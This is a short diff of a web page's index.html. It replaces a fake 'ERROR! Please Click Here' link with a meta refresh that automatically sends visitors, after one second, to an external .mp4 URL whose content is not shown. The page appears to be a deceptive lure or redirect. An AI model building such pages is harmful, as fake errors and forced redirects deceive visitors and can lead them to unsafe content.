--- a/index.html
+++ b/index.html
@@ -1,1 +1,2 @@
-ERROR! Please Click <a href="https://ex.masc.biz/bestcreating.mp4">Here</a> To Continue...
+<meta http-equiv="refresh" content="1; URL=https://ex.masc.biz/bestcreating.mp4" />
+1 Sec...
